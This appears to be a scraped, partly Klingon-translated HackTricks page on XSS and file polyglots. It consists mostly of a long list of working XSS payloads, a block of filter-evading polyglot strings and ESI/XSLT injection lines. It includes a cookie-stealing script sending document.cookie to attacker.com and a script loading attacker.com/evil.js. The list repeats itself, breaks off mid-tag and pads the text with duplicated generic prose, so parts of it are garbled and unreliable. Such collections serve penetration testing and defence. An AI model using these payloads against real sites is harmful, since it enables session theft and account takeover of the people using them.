<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and gain unauthorized access to systems.

Polygloths can be created by manipulating the file's structure and content to make it appear as different file types. This can be achieved by adding specific headers, changing file extensions, or embedding different file formats within the same file.

By using polygloths, hackers can trick security systems into treating the file as harmless, while it actually contains malicious code or exploits. This allows them to bypass security checks and execute their attacks without detection.

Polygloths can be used in various hacking scenarios, such as phishing attacks, malware distribution, or remote code execution. They can be delivered through different channels, including email attachments, malicious websites, or compromised software.

To protect against polygloths, it is important to have robust security measures in place. This includes using up-to-date antivirus software, implementing strong access controls, and educating users about the risks of opening unknown files.

By understanding the concept of polygloths and how they can be used in hacking, security professionals can better defend against these types of attacks and mitigate the risks they pose to systems and data.

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. They are often used in hacking to bypass security measures and gain unauthorized access to systems.

Polygloths can be created by manipulating the file's structure and content to make it appear as different file types. This can be achieved by adding specific headers, changing file extensions, or embedding different file formats within the same file.

By using polygloths, hackers can trick security systems into treating the file as harmless, while it actually contains malicious code or exploits. This allows them to bypass security checks and execute their attacks without detection.

Polygloths can be used in various hacking scenarios, such as phishing attacks, malware distribution, or remote code execution. They can be delivered through different channels, including email attachments, malicious websites, or compromised software.

To protect against polygloths, it is important to have robust security measures in place. This includes using up-to-date antivirus software, implementing strong access controls, and educating users about the risks of opening unknown files.

By understanding the concept of polygloths and how they can be used in hacking, security professionals can better defend against these types of attacks and mitigate the risks they pose to systems and data.

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

XSS

Qa'Hom Tests

1. Alert

<script>alert('Qa'Hom!')</script>

2. Image Source

<img src="x" onerror="alert('Qa'Hom!')">

3. Input Value

<input type="text" value="<script>alert('Qa'Hom!')</script>">

4. URL Parameter

https://example.com/?q=<script>alert('Qa'Hom!')</script>

5. Cookie

<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie</script>

6. Local Storage

<script>localStorage.setItem('cookie', document.cookie)</script>

7. Document Write

<script>document.write('<script src="https://attacker.com/evil.js"></script>')</script>

8. Event Handler

<button onclick="alert('Qa'Hom!')">Click me!</button>

9. SVG

<svg onload="alert('Qa'Hom!')"></svg>

10. Style Attribute

<div style="background-image: url('x'); width: expression(alert('Qa'Hom!'));">Test</div>

11. HREF Attribute

<a href="javascript:alert('Qa'Hom!')">Click me!</a>

12. Form Action

<form action="javascript:alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

13. Textarea

<textarea><script>alert('Qa'Hom!')</script></textarea>

14. Onload Attribute

<body onload="alert('Qa'Hom!')">

15. Image Tag

<image src="x" onerror="alert('Qa'Hom!')">

16. Div Tag

<div onmouseover="alert('Qa'Hom!')">Hover over me!</div>

17. Script Tag

<script>alert('Qa'Hom!')</script>

18. Iframe Tag

<iframe src="javascript:alert('Qa'Hom!')"></iframe>

19. Object Tag

<object data="javascript:alert('Qa'Hom!')"></object>

20. Embed Tag

<embed src="javascript:alert('Qa'Hom!')">

21. Audio Tag

<audio src="javascript:alert('Qa'Hom!')"></audio>

22. Video Tag

<video src="javascript:alert('Qa'Hom!')"></video>

23. Source Tag

<source src="javascript:alert('Qa'Hom!')">

24. Track Tag

<track src="javascript:alert('Qa'Hom!')">

25. Input Tag

<input type="text" onfocus="alert('Qa'Hom!')">

26. Select Tag

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

27. Textarea Tag

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

28. Button Tag

<button onclick="alert('Qa'Hom!')">Click me!</button>

29. Onerror Attribute

<img src="x" onerror="alert('Qa'Hom!')">

30. Onload Attribute

<body onload="alert('Qa'Hom!')">

31. Onmouseover Attribute

<div onmouseover="alert('Qa'Hom!')">Hover over me!</div>

32. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

33. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

34. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

35. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

36. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

37. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

38. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

39. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

40. Ondblclick Attribute

<button ondblclick="alert('Qa'Hom!')">Double click me!</button>

41. Onmousedown Attribute

<button onmousedown="alert('Qa'Hom!')">Click me!</button>

42. Onmouseup Attribute

<button onmouseup="alert('Qa'Hom!')">Click me!</button>

43. Onmousemove Attribute

<div onmousemove="alert('Qa'Hom!')">Move your mouse!</div>

44. Onmouseout Attribute

<div onmouseout="alert('Qa'Hom!')">Mouse out!</div>

45. Onmouseenter Attribute

<div onmouseenter="alert('Qa'Hom!')">Mouse enter!</div>

46. Onmouseleave Attribute

<div onmouseleave="alert('Qa'Hom!')">Mouse leave!</div>

47. Oncontextmenu Attribute

<div oncontextmenu="alert('Qa'Hom!')">Right click me!</div>

48. Onresize Attribute

<body onresize="alert('Qa'Hom!')">

49. Onscroll Attribute

<body onscroll="alert('Qa'Hom!')">

50. Onunload Attribute

<body onunload="alert('Qa'Hom!')">

51. Onhashchange Attribute

<body onhashchange="alert('Qa'Hom!')">

52. Onmessage Attribute

<body onmessage="alert('Qa'Hom!')">

53. Onbeforeunload Attribute

<body onbeforeunload="alert('Qa'Hom!')">

54. Onoffline Attribute

<body onoffline="alert('Qa'Hom!')">

55. Ononline Attribute

<body ononline="alert('Qa'Hom!')">

56. Onpagehide Attribute

<body onpagehide="alert('Qa'Hom!')">

57. Onpageshow Attribute

<body onpageshow="alert('Qa'Hom!')">

58. Onpopstate Attribute

<body onpopstate="alert('Qa'Hom!')">

59. Onstorage Attribute

<body onstorage="alert('Qa'Hom!')">

60. Onunload Attribute

<body onunload="alert('Qa'Hom!')">

61. Onbeforeprint Attribute

<body onbeforeprint="alert('Qa'Hom!')">

62. Onafterprint Attribute

<body onafterprint="alert('Qa'Hom!')">

63. Onbeforecut Attribute

<input type="text" onbeforecut="alert('Qa'Hom!')">

64. Oncut Attribute

<input type="text" oncut="alert('Qa'Hom!')">

65. Onbeforecopy Attribute

<input type="text" onbeforecopy="alert('Qa'Hom!')">

66. Oncopy Attribute

<input type="text" oncopy="alert('Qa'Hom!')">

67. Onbeforepaste Attribute

<input type="text" onbeforepaste="alert('Qa'Hom!')">

68. Onpaste Attribute

<input type="text" onpaste="alert('Qa'Hom!')">

69. Onsearch Attribute

<input type="search" onsearch="alert('Qa'Hom!')">

70. Oninvalid Attribute

<input type="text" oninvalid="alert('Qa'Hom!')">

71. Onreset Attribute

<form onreset="alert('Qa'Hom!')">
  <input type="reset" value="Reset">
</form>

72. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

73. Oninput Attribute

<input type="text" oninput="alert('Qa'Hom!')">

74. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

75. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

76. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

77. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

78. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

79. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

80. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

81. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

82. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

83. Oninput Attribute

<input type="text" oninput="alert('Qa'Hom!')">

84. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

85. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

86. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

87. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

88. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

89. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

90. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

91. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

92. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

93. Oninput Attribute

<input type="text" oninput="alert('Qa'Hom!')">

94. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

95. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

96. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

97. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

98. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

99. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

100. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

101. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

102. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

103. Oninput Attribute

<input type="text" oninput="alert('Qa'Hom!')">

104. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

105. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

106. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

107. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

108. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

109. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

110. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

111. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

112. Onsubmit Attribute

<form onsubmit="alert('Qa'Hom!')">
  <input type="submit" value="Submit">
</form>

113. Oninput Attribute

<input type="text" oninput="alert('Qa'Hom!')">

114. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</option>
</select>

115. Onfocus Attribute

<input type="text" onfocus="alert('Qa'Hom!')">

116. Onblur Attribute

<input type="text" onblur="alert('Qa'Hom!')">

117. Onkeydown Attribute

<input type="text" onkeydown="alert('Qa'Hom!')">

118. Onkeyup Attribute

<input type="text" onkeyup="alert('Qa'Hom!')">

119. Onkeypress Attribute

<input type="text" onkeypress="alert('Qa'Hom!')">

120. Onselect Attribute

<textarea onselect="alert('Qa'Hom!')">Select me!</textarea>

121. Onchange Attribute

<select onchange="alert('Qa'Hom!')">
  <option value="1">Option 1</option>
  <option value="2">Option 2</
```markup
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()

Polygloths

Polygloths

Polygloths are files that can be interpreted as multiple file types depending on the context in which they are executed. This can be useful for bypassing security measures or exploiting vulnerabilities in certain systems.

Polygloths can be created by combining the syntax and structure of different file types into a single file. When executed, the file is interpreted differently depending on the software or system that is processing it.

For example, a polyglot file may appear as a harmless image file when opened in an image viewer, but when executed as a script, it can run malicious code. This can be used to trick users into opening the file, thinking it is safe, while actually executing harmful actions.

Polygloths can be used in various hacking techniques, such as:

• File Inclusion Attacks: By creating a polyglot file that can be interpreted as both an image file and a script, an attacker can exploit a file inclusion vulnerability to execute arbitrary code on a target system.

• Cross-Site Scripting (XSS): Polyglot files can be used to inject malicious code into web applications, bypassing input validation and executing arbitrary scripts in the context of the victim's browser.

• Data Exfiltration: Polyglot files can be used to hide sensitive data within seemingly harmless files, allowing an attacker to exfiltrate data without detection.

To create polygloths, hackers often leverage the differences in file format specifications and the way different software interprets them. By carefully crafting a file that conforms to multiple specifications, they can create a file that behaves differently depending on the context in which it is executed.

It is important for security professionals to be aware of polygloths and understand how they can be used in attacks. By understanding the techniques used to create and exploit polygloths, security measures can be put in place to detect and prevent their malicious use.

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>

qaStaHvIS AWS hacking vItlhutlh htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.